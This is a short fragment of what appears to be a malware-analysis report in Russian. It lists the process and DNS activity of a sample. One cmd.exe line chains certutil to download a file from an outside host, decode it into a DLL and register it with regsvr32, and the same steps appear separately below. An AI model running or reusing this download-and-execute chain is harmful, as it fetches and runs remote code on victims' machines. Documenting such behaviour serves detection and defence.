Техническая информация
- '<SYSTEM32>\cmd.exe' /C certutil -urlcache -split -f https://senamedicalclinic.com:80/download/artifact.txt artifact.txt & certutil -decode artifact.txt artifact.dll & regsvr32 artifact.dll
- DNS ASK se#####icalclinic.com
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://senamedicalclinic.com:80/download/artifact.txt artifact.txt
- '<SYSTEM32>\certutil.exe' -decode artifact.txt artifact.dll
- '<SYSTEM32>\regsvr32.exe' artifact.dll